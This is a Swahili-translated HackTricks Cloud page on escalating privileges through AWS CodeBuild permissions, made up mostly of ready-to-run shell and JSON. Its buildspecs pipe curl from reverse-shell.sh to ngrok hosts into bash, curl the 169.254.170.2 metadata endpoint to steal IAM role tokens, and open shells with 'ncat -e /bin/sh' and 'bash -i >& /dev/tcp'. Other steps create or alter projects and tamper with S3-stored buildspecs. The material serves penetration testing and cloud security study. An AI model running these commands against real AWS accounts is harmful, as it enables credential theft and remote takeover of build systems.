Swahili - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - Codebuild Privesc

Support HackTricks

codebuild

Pata maelezo zaidi katika:

AWS - Codebuild Enum

iam:PassRole, codebuild:CreateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

Mshambulizi mwenye ruhusa za iam:PassRole, codebuild:CreateProject, na codebuild:StartBuild au codebuild:StartBuildBatch ataweza kuongeza marupurupu kwa jukumu lolote la IAM la codebuild kwa kuunda na kuendesha moja.

# Enumerate then env and get creds
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"

JSON="{
\"name\": \"codebuild-demo-project\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"aws/codebuild/standard:1.0\",
\"computeType\": \"BUILD_GENERAL1_SMALL\"
},
\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"


REV_PATH="/tmp/rev.json"

printf "$JSON" > $REV_PATH

# Create project
aws codebuild create-project --cli-input-json file://$REV_PATH

# Build it
aws codebuild start-build --project-name codebuild-demo-project

# Wait 3-4 mins until it's executed
# Then you can access the logs in the console to find the AWS role token in the output

# Delete the project
aws codebuild delete-project --name codebuild-demo-project

Potential Impact: Privesc ya moja kwa moja kwa yoyote AWS Codebuild role.

Katika Codebuild container faili /codebuild/output/tmp/env.sh ina env vars zote zinazohitajika kufikia metadata credentials.

Faili hii ina env variable AWS_CONTAINER_CREDENTIALS_RELATIVE_URI ambayo ina URL path ya kufikia credentials. Itakuwa kitu kama hiki /v2/credentials/2817702c-efcf-4485-9730-8e54303ec420

Ongeza hiyo kwenye URL http://169.254.170.2/ na utaweza kutoa credentials za role.

Zaidi ya hayo, pia ina env variable ECS_CONTAINER_METADATA_URI ambayo ina URL kamili ya kupata metadata info kuhusu container.

iam:PassRole, codebuild:UpdateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

Kama ilivyo katika sehemu iliyopita, ikiwa badala ya kuunda mradi wa build unaweza kuubadilisha, unaweza kuonyesha IAM Role na kuiba token

REV_PATH="/tmp/codebuild_pwn.json"

# Enumerate then env and get creds
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"

# You need to indicate the name of the project you want to modify
JSON="{
\"name\": \"<codebuild-demo-project>\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"aws/codebuild/standard:1.0\",
\"computeType\": \"BUILD_GENERAL1_SMALL\"
},
\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"

printf "$JSON" > $REV_PATH

aws codebuild update-project --cli-input-json file://$REV_PATH

aws codebuild start-build --project-name codebuild-demo-project

Athari Zinawezekana: Privesc ya moja kwa moja kwa yoyote AWS Codebuild role.

codebuild:StartBuild | codebuild:StartBuildBatch

Kwa kuwa na moja ya ruhusa hizi tu inatosha kuanzisha build na buildspec mpya na kuiba token ya iam role iliyotolewa kwa mradi:

cat > /tmp/builspec.yml <<EOF
version: 0.2

phases:
build:
commands:
- curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh
EOF

aws codebuild start-build --project <project-name> --buildspec-override file:///tmp/builspec.yml

Athari Zinawezekana: Privesc moja kwa moja kwa majukumu ya AWS Codebuild yaliyoambatanishwa.

codebuild:UpdateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

Kama katika sehemu iliyopita lakini bila ruhusa ya iam:PassRole, unaweza kutumia vibaya ruhusa hizi kubadilisha miradi ya Codebuild iliyopo na kufikia jukumu walilopewa tayari.

REV_PATH="/tmp/codebuild_pwn.json"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"

# You need to indicate the name of the project you want to modify
JSON="{
\"name\": \"codebuild_lab_3_project\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n  fast-fail: false\\\\n  build-list:\\\\n    - identifier: build1\\\\n      env:\\\\n        variables:\\\\n          BUILD_ID: build1\\\\n      buildspec: |\\\\n        version: 0.2\\\\n        env:\\\\n          shell: sh\\\\n        phases:\\\\n          build:\\\\n            commands:\\\\n              - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n      ignore-failure: true\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
\"computeType\": \"BUILD_GENERAL1_SMALL\",
\"imagePullCredentialsType\": \"CODEBUILD\"
}
}"

printf "$JSON" > $REV_PATH

# Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild!

aws codebuild update-project --cli-input-json file://$REV_PATH

aws codebuild start-build-batch --project-name codebuild-demo-project

Potential Impact: Privesc ya moja kwa moja kwa roles za AWS Codebuild zilizoambatanishwa.

SSM

Kuwa na ruhusa za kutosha kuanzisha ssm session inawezekana kuingia ndani ya mradi wa Codebuild unaojengwa.

Mradi wa codebuild utahitaji kuwa na breakpoint:

phases:
pre_build:
commands:
- echo Entered the pre_build phase...
- echo "Hello World" > /tmp/hello-world
      - codebuild-breakpoint

Na kisha:

aws codebuild batch-get-builds --ids <buildID> --region <region> --output json
aws ssm start-session --target <sessionTarget> --region <region>

Kwa maelezo zaidi angalia nyaraka.

(codebuild:StartBuild | codebuild:StartBuildBatch), s3:GetObject, s3:PutObject

Mshambulizi anayeweza kuanzisha/kurejesha ujenzi wa mradi maalum wa CodeBuild ambao unahifadhi faili lake la buildspec.yml kwenye ndoo ya S3 ambayo mshambulizi ana haki ya kuandika, anaweza kupata utekelezaji wa amri katika mchakato wa CodeBuild.

Kumbuka: kupandisha daraja ni muhimu tu ikiwa mfanyakazi wa CodeBuild ana jukumu tofauti, ikiwezekana lenye haki zaidi, kuliko la mshambulizi.

aws s3 cp s3://<build-configuration-files-bucket>/buildspec.yml ./

vim ./buildspec.yml

# Add the following lines in the "phases > pre_builds > commands" section
#
#    - apt-get install nmap -y
#    - ncat <IP> <PORT> -e /bin/sh

aws s3 cp ./buildspec.yml s3://<build-configuration-files-bucket>/buildspec.yml

aws codebuild start-build --project-name <project-name>

# Wait for the reverse shell :)

Unaweza kutumia kitu kama hiki builspec kupata reverse shell:

buildspec.yml
version: 0.2

phases:
build:
commands:
- bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1

Impact: Privesc ya moja kwa moja kwa jukumu linalotumiwa na mfanyakazi wa AWS CodeBuild ambaye kawaida ana ruhusa za juu.

Kumbuka kuwa buildspec inaweza kutarajiwa katika muundo wa zip, kwa hivyo mshambuliaji atalazimika kupakua, kufungua, kurekebisha buildspec.yml kutoka kwenye saraka kuu, kufunga tena na kupakia

Maelezo zaidi yanaweza kupatikana hapa.

Potential Impact: Privesc ya moja kwa moja kwa majukumu ya AWS Codebuild yaliyounganishwa.

Support HackTricks
PreviousAWS - Chime PrivescNextAWS - Codepipeline Privesc

Last updated